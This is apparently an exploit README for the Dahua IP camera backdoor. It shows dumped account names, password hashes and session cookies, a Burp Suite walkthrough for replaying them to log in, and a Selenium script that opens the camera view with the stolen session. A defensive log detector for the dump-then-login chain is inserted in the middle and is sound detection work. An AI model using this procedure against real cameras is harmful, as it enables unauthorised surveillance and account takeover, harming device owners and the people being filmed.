exploit - dahua camera backdoor

Exploit Code

For security assessment only. On a vulnerable Dahua camera, the username, password and cookies retrieved by the exploit can be used to access the camera video.

$ python exploit_dahua.py 192.168.1.103
[*] http://192.168.1.103/current_config/Account1 - 3 users
('username:', u'admin')
('password:', u'C580B3BD6C91A2349AA49B1E76DE70D3')
('session:', u'1927849572')
('session_password:', 'DBA284AF02A8108CE34F4AD38ED99B68')
('seeeion_cookie:', 'DHLangCookie30=SimpChinese;DhWebCookie=%7B%22username%22%3A%22admin%22%2C%22pswd%22%3A%22%22%2C%22talktype%22%3A1%2C%22logintype%22%3A0%7D%3B;DhWebClientSessionID=2129659796')

('username:', u'default')
('password:', u'F510910D07096DE8766775A4805FBB13')
('session:', u'826187816')
('session_password:', '9333F4C182F3F5E265ED280AA9E5DBDF')
('seeeion_cookie:', 'DHLangCookie30=SimpChinese;DhWebCookie=%7B%22username%22%3A%22default%22%2C%22pswd%22%3A%22%22%2C%22talktype%22%3A1%2C%22logintype%22%3A0%7D%3B;DhWebClientSessionID=1156207906')

How to log in to a Dahua camera with Burp Suite?

Run exploit_dahua.py (as shown above) to obtain the username, password, session id and cookies; these values are used in Burp Suite below.

Open the camera's default web page, for example http://192.168.1.103/.


Intercept the HTTP request with Burp Suite: enter a username and password and click the submit button. Burp Suite receives the login request, whose body is shown below.

POST /RPC2_Login HTTP/1.1
Host: 192.168.1.103
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.1.103/
X-Requested-With: XMLHttpRequest
X-Request: JSON
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 102
Cookie: DHLangCookie30=SimpChinese
Connection: close

{"method":"global.login","params":{"userName":"admin","password":"","clientType":"Web3.0"},"id":10000}

Forward the request in Burp Suite. The browser then sends a second request, shown below, which Burp Suite intercepts. Before forwarding it, replace the following parts with the values from the exploit output:

  • Cookie
  • Post body - session
  • Post body - password

POST /RPC2_Login HTTP/1.1
Host: 192.168.1.103
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.1.103/
X-Requested-With: XMLHttpRequest
X-Request: JSON
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 154
Cookie: <****replace-here****>
Connection: close

{"method":"global.login","session":<****replace-here****>,"params":{"userName":"admin","password":"<****replace-here****>","clientType":"Web3.0"},"id":10000}

Everything then proceeds normally, and the camera's monitor panel appears.
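The login chain above leaves a recognisable trace in the camera's web server log: a request to /current_config/Account1 followed shortly by a POST /RPC2_Login from the same client. The following detector is added here as an example and is not part of the original exploit repository; it correlates the two events over constructed combined-format log lines, and the log format, sample addresses and 5-minute window are assumptions.

```python
import re
from datetime import datetime

# Constructed combined-format access-log lines for a camera web server
# (invented for this example, not captured from a real device).
SAMPLE_LOG = """\
192.168.1.50 - - [10/Mar/2017:10:01:02 +0000] "GET /current_config/Account1 HTTP/1.1" 200 1532 "-" "python-requests/2.13.0"
192.168.1.50 - - [10/Mar/2017:10:01:09 +0000] "POST /RPC2_Login HTTP/1.1" 200 211 "http://192.168.1.103/" "Mozilla/5.0"
192.168.1.20 - - [10/Mar/2017:10:02:30 +0000] "POST /RPC2_Login HTTP/1.1" 200 211 "http://192.168.1.103/" "Mozilla/5.0"
192.168.1.20 - - [10/Mar/2017:10:02:31 +0000] "GET /jsCore/Global.js HTTP/1.1" 200 9001 "http://192.168.1.103/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
CONFIG_PATH_RE = re.compile(r"^/current_config(/|$)")  # the unauthenticated config-file path
CORRELATION_WINDOW_S = 300  # assumed: a login within 5 minutes of a dump is treated as chained

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "status": int(m.group("status"))}

def detect(log_text):
    """Return (client_ip, finding) tuples in log order.
    CONFIG_DUMP: /current_config/ served with 200 (the account file with hashes);
    CONFIG_DUMP_ATTEMPT: requested but not served; CHAINED_LOGIN: POST /RPC2_Login
    from a client that dumped the config inside the window (the replay login above).
    """
    findings = []
    last_dump = {}  # client ip -> timestamp of its most recent successful dump
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if CONFIG_PATH_RE.match(rec["path"]):
            ok = rec["status"] == 200
            findings.append((rec["ip"], "CONFIG_DUMP" if ok else "CONFIG_DUMP_ATTEMPT"))
            if ok:
                last_dump[rec["ip"]] = rec["ts"]
        elif rec["method"] == "POST" and rec["path"] == "/RPC2_Login":
            seen = last_dump.get(rec["ip"])
            if seen is not None and (rec["ts"] - seen).total_seconds() <= CORRELATION_WINDOW_S:
                findings.append((rec["ip"], "CHAINED_LOGIN"))
    return findings
```

The second client (192.168.1.20) logs in without a preceding config dump and is not flagged, which is the expected behaviour for a normal browser session.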


To open the camera view automatically, you can try the following yourself:

from selenium import webdriver

wdpath = "/path/to/chrome_webdriver"
host = "192.168.1.103"  # camera address; placeholder
# the session cookie string printed by exploit_dahua.py; placeholder value
cookie_str = "DHLangCookie30=SimpChinese;DhWebClientSessionID=<session-id>"
chrome = webdriver.Chrome(wdpath)
# Selenium only sets cookies for the domain currently loaded: open the page first,
# add each cookie, then load it again with the session attached.
chrome.get('http://{}/'.format(host))
for pair in cookie_str.split(';'):
    name, value = pair.split('=', 1)
    chrome.add_cookie({'name': name, 'value': value})
chrome.get('http://{}/'.format(host))

References

  1. http://www.freebuf.com/news/128963.html
  2. http://seclists.org/fulldisclosure/2017/Mar/9
  3. https://ipvm.com/reports/dahua-backdoor?code=bash